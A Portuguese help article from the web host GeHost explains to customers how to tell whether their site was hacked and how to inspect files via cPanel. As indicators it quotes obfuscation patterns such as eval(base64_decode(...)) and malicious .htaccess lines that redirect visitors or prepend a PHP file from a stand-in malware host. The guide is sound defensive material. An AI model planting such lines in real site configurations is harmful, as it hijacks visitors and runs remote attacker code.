Como identificar se seu site foi invadido e injetado com código malicioso
Olá, querido cliente da GeHost! 🌟
Seu site é como uma casa digital — protegido, acolhedor e cheio de conteúdo valioso. Mas, assim como qualquer casa, ele pode ser invadido. E, infelizmente, um dos riscos mais comuns é a injeção de código malicioso por hackers. Não se assuste! Com um olhar atento e alguns passos simples, você consegue identificar se algo está errado. Vou te guiar com calma, como um verdadeiro Sensei da segurança digital. 💪🔐 ---🔍 Como saber se seu site foi invadido?
Veja alguns sinais que podem indicar que seu site foi comprometido:- Seu site está lento ou travando sem motivo aparente.
- Novas páginas ou links aparecem sem sua autorização.
- Seus visitantes recebem avisos de segurança no navegador (como "Este site pode ser perigoso").
- Seus e-mails profissionais começam a enviar mensagens estranhas ou spam.
- Seu site redireciona para páginas desconhecidas ou de conteúdo duvidoso.
- Conteúdo que você não escreveu aparece no seu site — como textos em outro idioma, anúncios ou códigos estranhos.
🛠️ Passo a passo: Como verificar se há código malicioso no seu site
Vamos usar o cPanel — o painel de controle da GeHost — para fazer uma inspeção rápida.- Entre no cPanel do seu domínio:
Use seu login e senha no painel painel.gehost.com.br.
Abra o Gerenciador de Arquivos:
No cPanel, clique em “Arquivos” e depois em “Gerenciador de Arquivos”.
Navegue até a pasta pública:
Na árvore de pastas, clique em public_html (ou o nome da sua pasta principal).
Procure arquivos estranhos:Olhe com atenção por arquivos com nomes estranhos, como:
index.phpcom conteúdo diferente do seu.- Arquivos com nomes como
12345.php,temp.php,backup.php. - Arquivos com extensão
.jsou.phpque não são seus.
Se encontrar algo assim, não abra — pode ser perigoso.
Verifique o código-fonte de páginas do site:Abra uma página do seu site no navegador, clique com o botão direito e escolha “Exibir código-fonte”.
Procure por trechos como:
eval(base64_decode(...))
document.write(unescape(...))Scripts que redirecionam automaticamente.
Esses são sinais clássicos de injeção de código malicioso.
Verifique arquivos de configuração:Procure por arquivos como .htaccess na pasta public_html. Ele pode estar sendo usado para redirecionamentos maliciosos.
Abra o arquivo com o editor no cPanel e veja se há linhas como:
Redirect 301 / http://site-perigoso.com
php_value auto_prepend_file "http://malware.com/evil.php"
Se encontrar, apague ou corrija imediatamente.
---🛡️ O que fazer se seu site foi invadido?
Se você confirmou a presença de código malicioso, aqui está o que fazer:- Desative temporariamente seu site (via cPanel ou bloqueando o domínio no DNS) para evitar mais danos.
- Reforce sua senha de cPanel e e-mail. Use uma senha forte (letras maiúsculas, minúsculas, números e símbolos).
- Atualize todos os sistemas do seu site (WordPress, lojas virtuais, CMS).
- Use um scanner de segurança (como o Wordfence, se for WordPress) para escanear todo o site.
- Entre em contato com o suporte da GeHost — estamos aqui para ajudar! Envie o relato com detalhes e, se possível, o código suspeito.
💡 Dica do Sensei
Prevenir é melhor que remediar. Sempre:
- Atualize seu site e plugins com frequência.
- Não use senhas fáceis.
- Evite instalar plugins ou temas de fontes duvidosas.
- Faça backup regular (use o recurso Backup no cPanel).
📞 Precisa de ajuda?
Se tiver dúvidas, ou se precisar de apoio técnico, entre em contato com o suporte da GeHost — estamos aqui para te proteger.
Seu plano inclui 30 dias grátis de suporte após a entrega. Use esse tempo com sabedoria!
Com carinho,
Seu Sensei da Segurança
GeHost — Seu site, sua proteção